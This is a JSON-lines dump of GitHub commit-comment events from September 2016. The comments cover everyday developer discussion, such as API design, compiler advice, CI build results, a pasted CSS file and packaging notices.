{"id":"4565032994","type":"CommitCommentEvent","actor":{"login":"Aster89"},"repo":{"name":"Aster89/ProjectX"},"payload":{"comment":{"id":19027991,"position":59,"line":177,"path":"game/Scripts/ActionClassDefinition.gd","commit_id":"24cf83496a02207ffc6eed3dc5078b0f7a976505","created_at":"2016-09-14T22:33:52Z","updated_at":"2016-09-14T22:33:52Z","body":"I don't remember what's the token for \"not equal\" :laughing: "}},"created_at":"2016-09-14T22:33:52Z"}
{"id":"4565033009","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19027992,"position":161,"line":206,"path":"Yupi.Model/Domain/Rooms/Entity/RoomEntity.cs","commit_id":"88b59473f5f4d655d22b0264a2cf1210cdb3346f","created_at":"2016-09-14T22:33:52Z","updated_at":"2016-09-14T22:33:52Z","body":"It's this code to fix the multiple tiles isue?"}},"created_at":"2016-09-14T22:33:52Z"}
{"id":"4565041059","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19028005,"position":null,"line":null,"path":null,"commit_id":"7a5d0df083e473d86aa6de9a567464c9e6224aa0","created_at":"2016-09-14T22:35:38Z","updated_at":"2016-09-14T22:35:38Z","body":"@LuisPro Maybe open tibia has problems with SSL..."}},"created_at":"2016-09-14T22:35:38Z"}
{"id":"4565044196","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19028010,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-14T22:36:17Z","updated_at":"2016-09-14T22:36:17Z","body":"Yes, I was really torn on this one. Hence the huge warning. However, how do\nwe handle the fact we have from_unix but not to_unix? Should we then add\nfrom_naive_datetime to DateTime and have folks doing the conversion through\nthere then?\n\nOr another way to think about this: how do we expose the basic functions\nsuch as gregorian_seconds_to_datetime and vice-versa that we have in\nErlang's calendar? Would from_gregorian_seconds and to_gregorian_seconds be\nany better or worse than to_unix in your opinion?\n\nShould we also add something that allows us converting dates or times to\nseconds?\n\nI am totally OK with removing this function. I just want to hear your\nthoughts on the API, both in terms of consistency and completion.\n\n\n\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2016-09-14T22:36:17Z"}
{"id":"4565044945","type":"CommitCommentEvent","actor":{"login":"davisking"},"repo":{"name":"davisking/dlib"},"payload":{"comment":{"id":19028012,"position":null,"line":null,"path":null,"commit_id":"48df23a0e065e01c5ba176d4999fffb0d9a29e02","created_at":"2016-09-14T22:36:27Z","updated_at":"2016-09-14T22:36:27Z","body":"It's hard to say.  The compiler goes into some kind of infinite loop when trying to compile some of the dnn examples.  I've tried to work around whatever the bug is but haven't figured it out.  Also, CUDA doesn't work with VC2015 so it will be way slow regardless.  You are much better off installing ubuntu and using gcc if you want to do deep learning work.  \r\n\r\nAlso, it takes about 15 minutes to format your computer, install ubuntu, cuda, gcc, and then compile the dlib examples.  Seriously :).  On the other hand, when I installed VC2015 a few weeks ago it took all evening for the installer to finish.  Then when you compile the example programs you would notice that VC2015's compiler is brutally slow compared to gcc.  I've never timed it, but for example, when I compile the dlib unit test suite in ubuntu (or any other environment like os X or redhat or whatever) it only takes a few minutes.  However, when I want to compile and run the dlib unit tests with visual studio it takes hours.  I have a script I run and just leave it going for hours while I do something else.  Then the size of the executable visual studio produces is monstrously large compared to what gcc produces.  gcc also produces much faster programs.  For example, the face detector in dlib is noticeably faster in gcc than in visual studio.  \r\n\r\nI used to be a big fan of visual studio but the last few versions of it have been unabashedly horrible compared to gcc.  It's slower to compile, the binaries are bloated, and the standards conformance is awful.  GCC supported all of C++11 years ago but visual studio still doesn't support C++11.  And you can't use CUDA in visual studio 2015.  So I'm just saying.  Unless you have some external requirement forcing you to use visual studio I would use gcc :)"}},"created_at":"2016-09-14T22:36:27Z"}
{"id":"4565053238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028022,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-14T22:38:20Z","updated_at":"2016-09-14T22:38:20Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.88%25-green.svg)</a>\n"}},"created_at":"2016-09-14T22:38:20Z"}
{"id":"4565055195","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19028028,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-14T22:38:50Z","updated_at":"2016-09-14T22:38:50Z","body":"Sorry whenever you do the next commit can you change the default to 4 bits of information?\r\nOf course as soon as I told you 3, I started getting POI, Number, Street, Suburb"}},"created_at":"2016-09-14T22:38:50Z"}
{"id":"4565066680","type":"CommitCommentEvent","actor":{"login":"bdionne"},"repo":{"name":"bdionne/protege-client"},"payload":{"comment":{"id":19028049,"position":5,"line":1171,"path":"src/main/java/org/protege/editor/owl/client/LocalHttpClient.java","commit_id":"d882144b598df405db89f4baf710534c50945b95","created_at":"2016-09-14T22:41:37Z","updated_at":"2016-09-14T22:41:37Z","body":"@johardi thanks, I'm going to rethink both this `ADMIN/NON_ADMIN` and policy object stuff. "}},"created_at":"2016-09-14T22:41:37Z"}
{"id":"4565067654","type":"CommitCommentEvent","actor":{"login":"Xlythe"},"repo":{"name":"Xlythe/AndroidTextManager"},"payload":{"comment":{"id":19028051,"position":13,"line":60,"path":"android-text-manager/src/main/java/com/xlythe/textmanager/text/TextReceiver.java","commit_id":"b2261df4ac65d430032bc1fe46d51c6ac92af3fe","created_at":"2016-09-14T22:41:50Z","updated_at":"2016-09-14T22:41:50Z","body":"I like the comments, but don't write \"TODO\" since there's nothing to do here."}},"created_at":"2016-09-14T22:41:50Z"}
{"id":"4565077408","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas"},"payload":{"comment":{"id":19028069,"position":null,"line":null,"path":null,"commit_id":"19e6e223ed33a5b2c665c624ea4a21156d3f3489","created_at":"2016-09-14T22:44:13Z","updated_at":"2016-09-14T22:44:13Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:44:13Z"}
{"id":"4565078568","type":"CommitCommentEvent","actor":{"login":"rome1983"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19028073,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-14T22:44:31Z","updated_at":"2016-09-14T22:44:31Z","body":"No way to open issue."}},"created_at":"2016-09-14T22:44:31Z"}
{"id":"4565078951","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-nm"},"payload":{"comment":{"id":19028074,"position":null,"line":null,"path":null,"commit_id":"c9dbf350229363334be13d863d4d23ba8cf800b3","created_at":"2016-09-14T22:44:36Z","updated_at":"2016-09-14T22:44:36Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:44:36Z"}
{"id":"4565079869","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-nm"},"payload":{"comment":{"id":19028079,"position":null,"line":null,"path":null,"commit_id":"9fbd1e6a7be102ac25a52732c8af496d99f44d05","created_at":"2016-09-14T22:44:49Z","updated_at":"2016-09-14T22:44:49Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:44:49Z"}
{"id":"4565082324","type":"CommitCommentEvent","actor":{"login":"SKART1"},"repo":{"name":"SKART1/test-butler"},"payload":{"comment":{"id":19028088,"position":null,"line":null,"path":null,"commit_id":"6008e72462ae86ac71491ee2273990d36ec8ab8b","created_at":"2016-09-14T22:45:27Z","updated_at":"2016-09-14T22:45:27Z","body":"Firstly - to receive error description you need instead of:\r\n\r\n```\r\nin = child.getInputStream();\r\n```\r\nmake\r\n\r\n```\r\nin = child.getErrorStream();\r\n```\r\n\r\nSecondly - it is not allowed to grant or revoke permission to yourself (what is the purpose of permissions which app itself can change? :)  )\r\n\r\n\r\nThirdly - test-butler (at least in my branch) may deal with this situations, but only if you are running you code on emulator. What shall you do:\r\n1. Clone `test-butler`\r\n2. ./gradlew build\r\n3. adb install test-butler/test-butler-app/build/outputs/apk/test-butler-app-full-debug.apk\r\n4. Add test-butler/test-butler-library/build/outputs/aar/test-butler-library-debug.aar to your project\r\n5. Invoke `TestButler.revokePermission(targetContext.getPackageName(), Manifest.permission.CALL_PHONE);` like [here](https://github.com/SKART1/test-butler/blob/master/test-butler-demo/src/androidTest/java/com/linkedin/android/testbutler/demo/PermissionTest.java)\r\n\r\n\r\nSee test-butler-demo for more info\r\n\r\n\r\nP.S. Could you move this discussion to other place - issue for example?\r\n"}},"created_at":"2016-09-14T22:45:27Z"}
{"id":"4565085612","type":"CommitCommentEvent","actor":{"login":"gamerson"},"repo":{"name":"liferay/liferay-portal"},"payload":{"comment":{"id":19028093,"position":7,"line":8,"path":"modules/apps/screens/screens-service/bnd.bnd","commit_id":"609469e14751e86ec0ffddace7291ae8429e4cdd","created_at":"2016-09-14T22:46:19Z","updated_at":"2016-09-14T22:46:19Z","body":"So from 3.0.0 to 3.0.1 or 3.0 to 3.1 there can be no API breakages, thus, not removal of existing APIs.  Everything must be binary compatible.  Your calling code will be safe.  Semantic baselining is enabled in core build so it shouldn't be possible for a journal 3.1 api to be published that would break your code as far as API breakage is concerned.  Of course journal 3.0.1 could make a bug fix that doesn't break semantically but as far as side effects go it could break you calling code.  But you just gotta trust the Journal team :)  "}},"created_at":"2016-09-14T22:46:19Z"}
{"id":"4565087761","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-json"},"payload":{"comment":{"id":19028098,"position":null,"line":null,"path":null,"commit_id":"10f03728332cc258b55a88331047b75264415ba9","created_at":"2016-09-14T22:46:52Z","updated_at":"2016-09-14T22:46:52Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:46:52Z"}
{"id":"4565089973","type":"CommitCommentEvent","actor":{"login":"bebone"},"repo":{"name":"bebone/Shows"},"payload":{"comment":{"id":19028103,"position":null,"line":null,"path":null,"commit_id":"624b4239acb03a1f82f2b82b6b13007c77e95fc9","created_at":"2016-09-14T22:47:25Z","updated_at":"2016-09-14T22:47:25Z","body":"Voir pour les Delete,  Twig  JS fouilli fouilla ><"}},"created_at":"2016-09-14T22:47:25Z"}
{"id":"4565092452","type":"CommitCommentEvent","actor":{"login":"slycoder"},"repo":{"name":"slycoder/react-native-firestack"},"payload":{"comment":{"id":19028113,"position":null,"line":null,"path":null,"commit_id":"b098a60a18697c8d7f8440324aa2d01b2bd17f22","created_at":"2016-09-14T22:48:01Z","updated_at":"2016-09-14T22:48:01Z","body":"Thanks!  You are my hero.  I promise I'll get a chance to take another look once I put out some fires."}},"created_at":"2016-09-14T22:48:01Z"}
{"id":"4565092665","type":"CommitCommentEvent","actor":{"login":"slycoder"},"repo":{"name":"slycoder/react-native-firestack"},"payload":{"comment":{"id":19028114,"position":null,"line":null,"path":null,"commit_id":"b098a60a18697c8d7f8440324aa2d01b2bd17f22","created_at":"2016-09-14T22:48:06Z","updated_at":"2016-09-14T22:48:06Z","body":"🔥 "}},"created_at":"2016-09-14T22:48:06Z"}
{"id":"4565094323","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-json"},"payload":{"comment":{"id":19028118,"position":null,"line":null,"path":null,"commit_id":"d5f320e15eeeefdb4b9209586324cf21d09f7fb4","created_at":"2016-09-14T22:48:29Z","updated_at":"2016-09-14T22:48:29Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:48:29Z"}
{"id":"4565095581","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19028124,"position":null,"line":null,"path":null,"commit_id":"55ac1912c41d61e56127a5e3dc310bed3594da79","created_at":"2016-09-14T22:48:49Z","updated_at":"2016-09-14T22:48:49Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T22:48:49Z"}
{"id":"4565096572","type":"CommitCommentEvent","actor":{"login":"AndreSDS"},"repo":{"name":"AndreSDS/AndreSDS.github.io"},"payload":{"comment":{"id":19028126,"position":null,"line":null,"path":null,"commit_id":"402eb81c0695fdf3c1bfde7ed60f79466b7629bf","created_at":"2016-09-14T22:49:05Z","updated_at":"2016-09-14T22:49:05Z","body":" @charset \"UTF-8\";\r\n@import url(http://fonts.googleapis.com/css?family=Titillium+Web);\r\n@font-face{\r\n\tfont-family:'FonteLogo';\r\n\tscr:url(\"../_fonts/bubblegum-sans-regular.otf\");\r\n}\r\n\r\nbody{\r\n\tfont-family: 'Titillium', sans-serif;\r\n\tpadding: 0;\r\n\tmargin: 0;\r\n\tbackground-color: #ccc;\r\n\tcolor: #000;}\r\n\r\n#interface{\r\n\twidth: 900px;\r\n\tbackground-color: #fff;\r\n\tmargin: -20px auto 0 auto;\r\n\tbox-shadow: 0 0 10px rgba(0,0,0,.5);\r\n\tpadding: 15px;\r\n}\r\nheader #icone{\r\n\tposition: absolute;\r\n\tleft: 850px;\r\n\ttop: 65px;\r\n}\r\n#cabecalho{\r\n\tborder-bottom: 1px #606060 solid;\r\n\theight: 150px;\r\n\tbackground-image: url(\"../_imagens/glass-logo-peq.jpg\");\r\n\tbackground-repeat: no-repeat;\r\n\tbackground-position: 0px 80px;\r\n}\r\n#cabecalho h1{\r\n\tfont-family: 'Titillium Web', sans-serif;\r\n\tfont-size: 40px;\r\n\tcolor: #606060;\r\n\ttext-shadow: 1px 1px 1px rgba(0,0,0,.6);\r\n\tpadding: 0;\r\n\tmargin-bottom: 0px;\r\n}\r\n#cabecalho h2{\r\n\tfont-family: Arial, sans-serif;\r\n\tcolor: #888888;\r\n\tfont-size: 15px;\r\n\tpadding: 0;\r\n\tmargin-top: 0;\r\n}\r\n\r\np{text-align: justify;\r\n\ttext-indent: 50px;}\r\na{color: #606060;\r\ntext-decoration: none;}\r\na:hover{text-decoration: underline;}\r\n\r\nfigure.foto-legenda{\r\n\tposition: relative;\r\n\tborder: 8px solid white;\r\n\tbox-shadow: 1px 1px 4px black;\r\n}\r\nfigure.foto-legenda img{\r\n\theight: 100%;\r\n\twidth: 100%;\r\n}\r\nfigure.foto-legenda figcaption{\r\n\tposition: absolute;\r\n\ttop: 0px;\r\n\tbackground-color: rgba(0,0,0,0.4);\r\n\tcolor: white;\r\n\twidth: 100%;\r\n\theight: 100%;\r\n\tpadding: 10px;\r\n\tbox-sizing: border-box;\r\n\topacity: 0;\r\n\ttransition: opacity 1s;\r\n}\r\nfigure.foto-legenda:hover figcaption{\r\n\topacity: 1;\r\n}\r\n\r\nnav #menu{\r\n\tdisplay: block;\r\n}\r\n#menu ul{\r\n\tmargin: 0;\r\n\ttop: 0;\r\n\tleft: 434px;\r\n\tposition: absolute;\r\n\tlist-style: none;\r\n\ttext-transform: uppercase;\r\n}\r\n#menu li{\r\n\ttransition:background-color 1.2s;\r\n\tdisplay: inline-block;\r\n\tbackground-color: #ddd;\r\n\tpadding: 8px;\r\n}\r\n#menu ul li a{\r\n\tcolor:#000;\r\n\ttext-decoration: none;\r\n}\r\n#menu h1{\r\n\tdisplay: none;\r\n}\r\n#menu li:hover{\r\n\tbackground-color: #606060;\r\n}\r\n#menu a:hover{\r\n\tcolor: #fff;\r\n}\r\n\r\n#corpo{\r\n\tdisplay: block;\r\n\twidth: 510px;\r\n\tfloat: left;\r\n\tborder-right: 1px solid #606060;\r\n\tpadding-right: 15px;\r\n}\r\n#noticia-principal h2{\r\n\tfont-size: 12pt;\r\n\tcolor: #606060;\r\n\tbackground-color: #ddd;\r\n\tpadding: 10px 0px 10px 0px;\r\n\tmargin: 10px 0px 10px 0px;\r\n}\r\n.direita{\r\n\ttext-align: right;\r\n}\r\n#cabecalho-artigo h1{\r\n\tfont-family: 'Titillium', sans-serif;\r\n\tfont-size: 20pt;\r\n\tcolor: #606060;\r\n\tmargin-bottom: 0px;\r\n\tmargin-top: 0px;\r\n\t}\r\n#cabecalho-artigo h2{\r\n\tfont-size: 13pt;\r\n\tcolor: #cacaca;\r\n\tbackground-color: #fff;\r\n\tmargin: 0px;\r\n}\r\n#cabecalho-artigo h3{\r\n\tfont-size: 12px;\r\n\tcolor: #606060;\r\n}\r\n#tabelaspec{\r\n\tmargin-left: auto;\r\n\tmargin-right: auto;\r\n\tborder-spacing: 0;\r\n\tborder:1px solid #606060;\r\n}\r\n#tabelaspec caption{\r\n\tcolor: #888888;\r\n\tfont-size: 18px;\r\n\tfont-weight: bolder;\r\n}\r\n#tabelaspec td{\r\n\tpadding: 5px;\r\n\tborder: 1px solid #606060;\r\n}\r\n#tabelaspec span{\r\n\tdisplay: block;\r\n\tfloat: right;\r\n\tcolor: #888;\r\n\tfont-size: 8px;\r\n\tmargin-top: 10px;\r\n}\r\n.ce{\r\n\tfont-weight: bold;\r\n\tvertical-align:top;\r\n\tcolor: #fff;\r\n\tbackground-color: #606060;\r\n\ttext-align: right;\r\n}\r\n.cd{\r\n\tbackground-color: #cecece;\r\n}\r\n#lateral{\r\n\tdisplay: block;\r\n\twidth: 350px;\r\n\tfloat: right;\r\n\tbackground-color:#ddd;\r\n\tpadding: 10px;\r\n\tmargin-top:10px;\r\n\tbox-shadow:2px 2px 2px rgba(0,0,0,.5);\r\n}\r\n#lateral h1{\r\n\tfont-family: 'Titillium',sans-serif;\r\n\tfont-size:20pt;\r\n\tcolor: #606060;\r\n\tmargin-top:0px;\r\n}\r\n#lateral h2{\r\n\tbackground-color:#606060;\r\n\tfont-size: 12pt;\r\n\tcolor: #fff;\r\n\tpadding:5px;\r\n}\r\n#rodape{\r\n\tclear: both;\r\n\tborder-top: 1px solid #606060;\r\n}\r\n#rodape p{\r\n\ttext-align: center;\r\n}\r\n#rodape a{\r\n\ttext-decoration: none;\r\n\tcolor: #000;\r\n}"}},"created_at":"2016-09-14T22:49:05Z"}
{"id":"4565097593","type":"CommitCommentEvent","actor":{"login":"mseeber"},"repo":{"name":"jackaudio/jackaudio.github.com"},"payload":{"comment":{"id":19028128,"position":null,"line":null,"path":null,"commit_id":"4f5bc5e2a503f0d0860cff47862abde85eff6938","created_at":"2016-09-14T22:49:20Z","updated_at":"2016-09-14T22:49:20Z","body":"These files are generated from markdown, but no worries, I will include the change into the markdown files and regenerate the site."}},"created_at":"2016-09-14T22:49:20Z"}
{"id":"4565097885","type":"CommitCommentEvent","actor":{"login":"AndreSDS"},"repo":{"name":"AndreSDS/AndreSDS.github.io"},"payload":{"comment":{"id":19028129,"position":null,"line":null,"path":null,"commit_id":"402eb81c0695fdf3c1bfde7ed60f79466b7629bf","created_at":"2016-09-14T22:49:24Z","updated_at":"2016-09-14T22:49:24Z","body":"Tentando criar o css."}},"created_at":"2016-09-14T22:49:24Z"}
{"id":"4565097940","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19028130,"position":28,"line":132,"path":"Yupi.Model/Domain/Rooms/HeightMap.cs","commit_id":"88b59473f5f4d655d22b0264a2cf1210cdb3346f","created_at":"2016-09-14T22:49:25Z","updated_at":"2016-09-14T22:49:25Z","body":"That's really more clean! Nice."}},"created_at":"2016-09-14T22:49:25Z"}
{"id":"4565101781","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028137,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-14T22:50:21Z","updated_at":"2016-09-14T22:50:21Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T22:50:21Z"}
{"id":"4565102813","type":"CommitCommentEvent","actor":{"login":"manneohrstrom"},"repo":{"name":"shotgunsoftware/tk-core"},"payload":{"comment":{"id":19028142,"position":null,"line":null,"path":null,"commit_id":"13bfc1e0b7c932fb25c3fab91b98a531d51d228b","created_at":"2016-09-14T22:50:35Z","updated_at":"2016-09-14T22:50:35Z","body":"Closes #331 "}},"created_at":"2016-09-14T22:50:35Z"}
{"id":"4565104591","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-erubis"},"payload":{"comment":{"id":19028147,"position":null,"line":null,"path":null,"commit_id":"63b4a7f6be4479a637e61f0c2a3747e917745c7b","created_at":"2016-09-14T22:51:00Z","updated_at":"2016-09-14T22:51:00Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:51:00Z"}
{"id":"4565106074","type":"CommitCommentEvent","actor":{"login":"exoji2e"},"repo":{"name":"ErikBjare/mysterious"},"payload":{"comment":{"id":19028155,"position":null,"line":null,"path":null,"commit_id":"77dad6e1e98fabc43d19ca9f05a4185cf38a4aaa","created_at":"2016-09-14T22:51:23Z","updated_at":"2016-09-14T22:51:23Z","body":"fattar inte varför outputen diffar på travis?!"}},"created_at":"2016-09-14T22:51:23Z"}
{"id":"4565107329","type":"CommitCommentEvent","actor":{"login":"samhocevar"},"repo":{"name":"lolengine/lol"},"payload":{"comment":{"id":19028158,"position":30,"line":30,"path":"src/gpu/blit.lolfx","commit_id":"bb98e8d5783dbca74506a6f7d84079598c3ef898","created_at":"2016-09-14T22:51:42Z","updated_at":"2016-09-14T22:51:42Z","body":"Yup! But I tend to prefer making such implicit promotions explicit. `vec2(0.5)` would be OK, too."}},"created_at":"2016-09-14T22:51:42Z"}
{"id":"4565108631","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19028164,"position":null,"line":null,"path":null,"commit_id":"4efab1d338efca02fe68f1855909006909cad785","created_at":"2016-09-14T22:52:02Z","updated_at":"2016-09-14T22:52:02Z","body":"@javierluraschi you may want to briefly review this. It builds on your change from yesterday by guarding against multiple simultaneous requests, and by not prompting for installation when suitable packages aren't found; this addresses the upgrade problem without raising the possibility that the user will get a dialog asking for the installation of packages when they took no obvious action requiring package installation."}},"created_at":"2016-09-14T22:52:02Z"}
{"id":"4565108672","type":"CommitCommentEvent","actor":{"login":"xyklex"},"repo":{"name":"dkrimmer84/l10n_co_point_of_sale"},"payload":{"comment":{"id":19028165,"position":null,"line":null,"path":null,"commit_id":"ae387d5c726b92c09e56f527a4ee0628465385ac","created_at":"2016-09-14T22:52:03Z","updated_at":"2016-09-14T22:52:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;EOU2zMao&#x2F;250-bug-pos-error-cuando-uno-valida-un-ticket-sin-cliente\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUG: POS - Error cuando uno valida un ticket sin cliente</a>"}},"created_at":"2016-09-14T22:52:03Z"}
{"id":"4565111469","type":"CommitCommentEvent","actor":{"login":"developit"},"repo":{"name":"developit/preact-compat"},"payload":{"comment":{"id":19028172,"position":6,"line":388,"path":"src/index.js","commit_id":"cc32ff3af40833f425556e5dc4ebda4c7a559bdf","created_at":"2016-09-14T22:52:46Z","updated_at":"2016-09-14T22:52:46Z","body":"Hmm yeah you're right.  I'm seeing `props.children` still be an Array in ReactShadow somehow, but it might be an update. I'll release your fix, might already be working haha."}},"created_at":"2016-09-14T22:52:46Z"}
{"id":"4565120504","type":"CommitCommentEvent","actor":{"login":"reagentoo"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":19028191,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-14T22:55:08Z","updated_at":"2016-09-14T22:55:08Z","body":"More USE flags introduced to ebuild (qmplay2 specific). However, it still needs to be tested more Gentoo-users. Also portage found small problem in qmplay2 desktop file installation:\r\n```\r\n * QA Notice: This package installs one or more .desktop files that do not\r\n * pass validation.\r\n * \r\n *      /usr/share/applications/QMPlay2.desktop: error: file contains group \"Next Shortcut Group\", but groups extending the format should start with \"X-\"\r\n *      /usr/share/applications/QMPlay2.desktop: error: file contains group \"PlayPause Shortcut Group\", but groups extending the format should start with \"X-\"\r\n *      /usr/share/applications/QMPlay2.desktop: error: file contains group \"Prev Shortcut Group\", but groups extending the format should start with \"X-\"\r\n *      /usr/share/applications/QMPlay2.desktop: error: file contains group \"Stop Shortcut Group\", but groups extending the format should start with \"X-\"\r\n *\r\n```\r\n"}},"created_at":"2016-09-14T22:55:08Z"}
{"id":"4565122307","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-erubis"},"payload":{"comment":{"id":19028194,"position":null,"line":null,"path":null,"commit_id":"ccacc1d4ab87a5e9e97cfe8858d8881a3d5df213","created_at":"2016-09-14T22:55:35Z","updated_at":"2016-09-14T22:55:35Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T22:55:35Z"}
{"id":"4565127287","type":"CommitCommentEvent","actor":{"login":"pauldavisthefirst"},"repo":{"name":"jackaudio/jackaudio.github.com"},"payload":{"comment":{"id":19028205,"position":null,"line":null,"path":null,"commit_id":"4f5bc5e2a503f0d0860cff47862abde85eff6938","created_at":"2016-09-14T22:56:49Z","updated_at":"2016-09-14T22:56:49Z","body":"Oops, sorry. My ever-worsening memory.\n\nOn Wed, Sep 14, 2016 at 5:49 PM, Markus Seeber <notifications@github.com>\nwrote:\n\n> These files are generated from markdown, but no worries, I will include\n> the change into the markdown files and regenerate the site.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jackaudio/jackaudio.github.com/commit/4f5bc5e2a503f0d0860cff47862abde85eff6938#commitcomment-19028128>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADrXg8cPPzbyOkTH-b6nEwdtjIjqIA-vks5qqHnxgaJpZM4J9VEZ>\n> .\n>\n"}},"created_at":"2016-09-14T22:56:49Z"}
{"id":"4565130524","type":"CommitCommentEvent","actor":{"login":"wxy"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19028213,"position":null,"line":null,"path":null,"commit_id":"8a1fa8c114b08683765e025c8e1826f2a16789a6","created_at":"2016-09-14T22:57:43Z","updated_at":"2016-09-14T22:57:43Z","body":"@echoma 问题不大~如果遇到不理解的，可以加上给校对的译注，用来说明情况。关于这一句，我是这样理解的，“除了 PostHTML 之外，还有别的技术可以做到这点。”——我的理解也未必就对。"}},"created_at":"2016-09-14T22:57:43Z"}
{"id":"4565132318","type":"CommitCommentEvent","actor":{"login":"Arkilus"},"repo":{"name":"Arkilus/hello"},"payload":{"comment":{"id":19028224,"position":2,"line":1,"path":"hello.rb","commit_id":"59dbca4e0f9a005dfd085ae4bddf4a514387bd5b","created_at":"2016-09-14T22:58:11Z","updated_at":"2016-09-14T22:58:11Z","body":"Fucked your hello"}},"created_at":"2016-09-14T22:58:11Z"}
{"id":"4565139127","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19028243,"position":null,"line":null,"path":null,"commit_id":"a989978ad19dd2d22d6faff96dccf44608571a18","created_at":"2016-09-14T22:59:56Z","updated_at":"2016-09-14T22:59:56Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 36](http://teamcity.otenv.com/viewLog.html?buildId=5215191&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T22:59:56Z"}
